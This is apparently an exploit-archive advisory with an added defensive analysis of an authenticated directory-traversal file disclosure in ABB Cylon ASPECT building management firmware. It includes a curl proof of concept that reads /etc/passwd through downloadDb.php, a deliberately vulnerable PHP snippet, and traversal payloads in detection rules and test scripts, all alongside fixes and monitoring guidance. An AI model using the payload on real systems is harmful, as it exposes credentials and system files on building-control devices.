ABB Cylon Aspect 3.07.02 - File Disclosure

Exploit Author: LiquidWorm
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2025-04-03
# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh


ABB Cylon Aspect 3.07.02 — Authenticated Arbitrary File Disclosure (Directory Traversal)

This article analyzes the authenticated arbitrary file disclosure vulnerability affecting ABB Cylon ASPECT firmware versions up to 3.07.02 (NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio). It explains the root cause, security impact, detection and remediation guidance, secure coding corrections, and operational hardening recommendations for building management systems (BMS).

Key facts

Vendor:             ABB Ltd.
Product:            ABB Cylon ASPECT (NEXUS, MATRIX-2, ASPECT-Enterprise, ASPECT-Studio)
Affected firmware:  ≤ 3.07.02
Vulnerability:      Authenticated arbitrary file disclosure via the downloadDb.php 'file' parameter (directory traversal)
Advisory:           ZSL-2024-5831 (discovered by Gjoko 'LiquidWorm' Krstic / zeroscience)
Date:               21.04.2024

Summary of the issue

The ASPECT web application exposes a script, downloadDb.php, that accepts a 'file' GET parameter and returns the contents of the named file. The value is neither validated nor constrained to the intended database directory, so "../" sequences traverse out of it. Exploitation requires an authenticated session (the PoC above sends a PHPSESSID cookie); with one, any file readable by the web server process can be retrieved, including system files, configuration, credentials or other sensitive data on the host.

Why this is dangerous

  • Disclosure of configuration files (for example storing credentials or keys) can lead to credential theft and lateral movement.
  • System files (such as /etc/passwd, SSH keys, or application logs) can reveal user accounts, running services and attack vectors.
  • In an OT/ICS context, leaks of system or configuration data can enable targeted sabotage of building controls or privileged takeover.

Technical analysis

Typical vulnerable pattern (illustrative)

<?php
// vulnerable snippet (illustrative only)
$baseDir = '/opt/aspect/databases/';
$file = $_GET['file'];              // no validation
$path = $baseDir . $file;
if (file_exists($path)) {
    header('Content-Type: application/octet-stream');
    readfile($path);
}
?>

Explanation: This simplified snippet concatenates an attacker-controlled query parameter to a base directory and serves the file. Without validating or canonicalizing the path, sequences like "../" (directory traversal) allow access to files outside the intended directory.

Secure coding fix — canonicalization + whitelist

<?php
// safer approach: canonicalize and enforce an allow-list root
$baseDir = '/opt/aspect/databases/';

// get raw user input
$requested = isset($_GET['file']) ? $_GET['file'] : '';

// sanitize: remove NULL bytes and control characters
$requested = preg_replace('/[\\0-\\x1F]/', '', $requested);

// canonicalize the root once; note that realpath() strips the trailing separator
$root = realpath($baseDir);

// build an absolute path and canonicalize (resolves "..", "." and symlinks;
// returns false when the target does not exist)
$fullPath = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);

// ensure realpath succeeded, the target is a regular file, and it sits
// strictly below $root. Comparing against "$root/" (separator included)
// stops a sibling such as /opt/aspect/databases_backup from passing a
// bare string-prefix test.
if ($root === false || $fullPath === false || !is_file($fullPath)
    || strncmp($fullPath, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
    http_response_code(400);
    echo 'Invalid file request';
    exit;
}

// further restrict acceptable files if possible (extension, name list)
$allowedExt = ['db', 'sqlite', 'bak'];
$ext = strtolower(pathinfo($fullPath, PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    http_response_code(403);
    echo 'Not allowed';
    exit;
}

// safe to serve
header('Content-Type: application/octet-stream');
readfile($fullPath);
?>

Explanation: This corrected code canonicalizes the root once and the requested path with realpath(), which resolves "..", "." and symlinks and returns false for a nonexistent target, then verifies that the resolved path lies strictly below the root. The comparison includes the trailing directory separator on purpose: realpath() strips it from the root, and a bare prefix test against '/opt/aspect/databases' would also accept a sibling directory such as '/opt/aspect/databases_backup'. The is_file() check rejects directories and device files, and the extension allow-list narrows what can be served at all. Together these measures prevent directory traversal and reduce the chance of exposing unintended files.
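The containment check above, as an added example in Python that is not part of the original advisory or of the ASPECT code base. It builds a constructed directory tree under a temporary directory (the /opt/aspect/databases layout and file names are assumptions for the demo), then runs the advisory's PoC payload, an encoded variant, a sibling-directory name, a symlink escape, an absolute path and an empty name through a canonicalize-then-contain check, side by side with the bare string-prefix check it replaces. It also assumes the web server hands the script a once-decoded parameter value.

```python
import os
import shutil
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested name does not resolve to an allowed file."""


def _canonical(root: str, requested: str):
    """Model what the server and script do before any check: one percent-decode
    (assumption: the server decodes the query string once), strip NUL and other
    control characters, then canonicalize with realpath (resolves '..', '.'
    and symlinks). os.path.join discards root for an absolute name, which the
    containment check catches as well."""
    name = unquote(requested)
    name = "".join(ch for ch in name if ord(ch) > 0x1F)
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, name))
    return real_root, candidate


def naive_prefix_check(root: str, requested: str) -> bool:
    """The weak check: existence plus a bare string-prefix comparison. A sibling
    directory such as 'databases_backup' starts with 'databases' and passes."""
    real_root, candidate = _canonical(root, requested)
    return os.path.exists(candidate) and candidate.startswith(real_root)


def resolve_download(root: str, requested: str,
                     allowed_ext=("db", "sqlite", "bak")) -> str:
    """Return the canonical path of `requested` strictly below `root`, or raise.
    commonpath() compares whole path components, so the sibling trick fails."""
    real_root, candidate = _canonical(root, requested)
    if candidate == real_root or os.path.commonpath([real_root, candidate]) != real_root:
        raise TraversalError(f"escapes root: {requested!r} -> {candidate}")
    if not os.path.isfile(candidate):
        raise TraversalError(f"not a regular file: {candidate}")
    ext = os.path.splitext(candidate)[1].lstrip(".").lower()
    if ext not in allowed_ext:
        raise TraversalError(f"extension not allowed: {ext!r}")
    return candidate


def build_fixture() -> str:
    """Constructed directory tree for the demo (not a real ASPECT layout)."""
    top = tempfile.mkdtemp(prefix="aspect-demo-")
    db = os.path.join(top, "opt", "aspect", "databases")
    bak = os.path.join(top, "opt", "aspect", "databases_backup")
    etc = os.path.join(top, "etc")
    for d in (db, bak, etc):
        os.makedirs(d)
    with open(os.path.join(db, "site.db"), "w") as f:
        f.write("constructed sqlite payload\n")
    with open(os.path.join(bak, "old.db"), "w") as f:
        f.write("constructed backup\n")
    with open(os.path.join(etc, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/home/root:/bin/sh\n")
    # a symlink inside the root that points outside it; realpath() follows it
    os.symlink(os.path.join(etc, "passwd"), os.path.join(db, "link.db"))
    return top


def run_demo() -> dict:
    """Run each request through both checks; returns {request: (naive, hardened)}."""
    top = build_fixture()
    root = os.path.join(top, "opt", "aspect", "databases")
    requests = [
        "site.db",                                # legitimate download
        "../../../../../../../../etc/passwd",     # the advisory's PoC payload
        "..%2F..%2F..%2Fetc%2Fpasswd",            # URL-encoded traversal
        "../databases_backup/old.db",             # sibling dir: bare-prefix bypass
        "link.db",                                # symlink pointing outside the root
        "/etc/passwd",                            # absolute path
        "",                                       # empty name: the root directory itself
    ]
    results = {}
    try:
        for req in requests:
            try:
                resolve_download(root, req)
                hardened = True
            except TraversalError:
                hardened = False
            results[req] = (naive_prefix_check(root, req), hardened)
    finally:
        shutil.rmtree(top)
    return results


if __name__ == "__main__":
    for req, (naive, hardened) in run_demo().items():
        print(f"{req!r:42} naive={naive!s:5} hardened={hardened}")
```

Only "site.db" passes the hardened check. The naive check additionally accepts the sibling-directory request and the empty name, which is exactly the class of bypass the separator-inclusive comparison in the PHP fix is there to stop; the symlink and the PoC payload are rejected by both because realpath() resolves them before either comparison runs.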

Detection and monitoring

Log-based hunting

  • Search web server logs for requests to downloadDb.php and any query parameters containing ../ or URL-encoded equivalents (%2e%2e, %252e%252e): e.g., look for "downloadDb.php?file=" entries.
  • Alert on repeated 200 responses to file download endpoints from authenticated accounts that don't normally perform downloads.
  • Monitor for requests that return content types or patterns that do not match expected database files (for example, responses containing typical system file headers or textual content).

Example Suricata/Snort-style detection snippet (defensive)

# Example Suricata/IDS rule to flag suspicious traversal attempts to downloadDb.php
alert http any any -> $HOME_NET any (msg:"WEB-ATTACK Directory Traversal attempt to downloadDb.php"; flow:established,to_server; http.uri; pcre:"/downloadDb\.php\?file=.*(\.\.\/|%2e%2e|%252e%252e)/i"; sid:1000001; rev:1;)

Explanation: This sample rule flags requests to downloadDb.php whose file parameter contains a raw or URL-encoded traversal sequence. Be clear about which buffer you are matching: in Suricata, http.uri is the normalized (percent-decoded) URI and http.uri.raw is the bytes on the wire. Against the normalized buffer a raw %2e%2e arrives as ".." and a double-encoded %252e%252e arrives as %2e%2e, so both are still covered by the alternatives above, but a deeper encoding or a backslash variant (..\ or %5c) is not. Tune and test rules against real traffic to minimize false positives before deploying them in production.
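The log-based hunting described above and the traversal matching the IDS rule performs, as an added example in Python that is not part of the original advisory or analysis. It parses constructed combined-format access log lines (the sample lines, addresses and timestamps are made up for the demo and do not come from a real ASPECT host), extracts the raw file= value for requests to downloadDb.php, and peels percent-encoding one layer at a time, so a double-encoded payload is reported together with the depth at which the "../" appeared and whether the server answered 200.

```python
import re
from urllib.parse import unquote

# Common/combined log format as written by lighttpd or Apache; only the
# fields the hunt needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# "../" or "..\" once decoded; the backslash form is worth catching too.
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
FILE_PARAM_RE = re.compile(r'(?:^|&)file=([^&]*)')

# Constructed sample lines: a legitimate download, the advisory's PoC, a
# double-encoded variant, an unrelated path with "../", and a backslash
# variant that the server refused.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2024:10:15:01 +0000] "GET /downloadDb.php?file=site.db HTTP/1.1" 200 40960',
    '10.0.0.9 - - [21/Apr/2024:10:16:12 +0000] "GET /downloadDb.php?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1311',
    '10.0.0.9 - - [21/Apr/2024:10:16:40 +0000] "GET /downloadDb.php?file=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 890',
    '10.0.0.7 - - [21/Apr/2024:10:17:05 +0000] "GET /static/../index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Apr/2024:10:18:30 +0000] "GET /downloadDb.php?file=..%5c..%5cetc%5cpasswd HTTP/1.1" 404 0',
]


def decode_rounds(value: str, max_rounds: int = 3):
    """Yield (depth, text) for the raw value and each successive percent-decoding
    until it stops changing. depth is the number of encoding layers peeled."""
    cur = value
    for depth in range(max_rounds + 1):
        yield depth, cur
        nxt = unquote(cur)
        if nxt == cur:
            return
        cur = nxt


def hunt(lines, script: str = "/downloadDb.php") -> list:
    """Return one finding per request to `script` whose file= value contains a
    traversal sequence at any decoding depth. A 200 response means the server
    most likely served the file; anything else is an attempt worth a look."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        path, _, query = m.group("uri").partition("?")
        if not path.endswith(script):
            continue                      # traversal elsewhere is out of scope here
        fm = FILE_PARAM_RE.search(query)
        if not fm:
            continue
        for depth, text in decode_rounds(fm.group(1)):
            if TRAVERSAL_RE.search(text):
                status = int(m.group("status"))
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": status,
                    "depth": depth,
                    "decoded": text,
                    "verdict": "likely disclosure" if status == 200 else "attempt",
                })
                break
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} depth={f['depth']} "
              f"{f['verdict']}: {f['decoded']}")
```

Run against the sample, it reports the PoC (depth 0, 200), the double-encoded request (depth 2, decoded to ../../etc/shadow, 200) and the refused backslash attempt (depth 1, 404), all from the same client; the unrelated /static/../index.php line is ignored because the hunt is scoped to the vulnerable script. Pivoting from the flagged PHPSESSID or source address to the account that held that session is the next step in the incident response checklist below.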

Mitigation and remediation

  • Apply vendor patches: check ABB support channels for firmware or application updates that address the issue and apply them as soon as possible.
  • If a patch is not available, restrict access to the management interface — place the device behind a firewall, VPN, or management network accessible only to authorized staff.
  • Disable or remove unused endpoints or scripts (for example, restrict or remove downloadDb.php) until a secure update is installed.
  • Harden authentication: enforce strong credentials, multi-factor authentication for remote access, rotate default passwords, and audit active sessions.
  • Implement network segmentation: isolate BMS/OT networks from corporate and Internet-facing networks, and use strict ACLs to limit which hosts can access management interfaces.
  • Implement integrity and confidentiality controls for sensitive files (least privilege for file permissions, encryption for stored secrets where feasible).

Incident response checklist (if you suspect exploitation)

  • Collect relevant logs (web server access logs, application logs, authentication events) and snapshot affected hosts for forensic analysis.
  • Identify the account(s) used to access the endpoint; disable compromised credentials and require rotation.
  • Search for unusual outbound connections or data exfiltration patterns from the BMS network.
  • Apply patches or temporary mitigations (network blocking, endpoint hardening) and coordinate with vendor support for root-cause remediation.
  • After containment, review and strengthen access controls, monitoring, and alerting to reduce recurrence risk.

Operational recommendations for building management systems

  • Adopt defense-in-depth: combine network segmentation, host hardening, robust authentication and continuous monitoring.
  • Restrict direct Internet access to BMS components; require remote maintenance via jump hosts or VPNs with strict logging.
  • Perform periodic security assessments and code reviews of web-facing components that handle file operations.
  • Keep inventories of firmware/software versions across deployed devices and maintain a patch management process for OT/ICS assets.

References and attribution

This vulnerability was publicly disclosed in Advisory ZSL-2024-5831 on 21.04.2024 and credited to Gjoko 'LiquidWorm' Krstic (@zeroscience). Affected product families include NEXUS, MATRIX-2, ASPECT-Enterprise and ASPECT-Studio running firmware up to 3.07.02.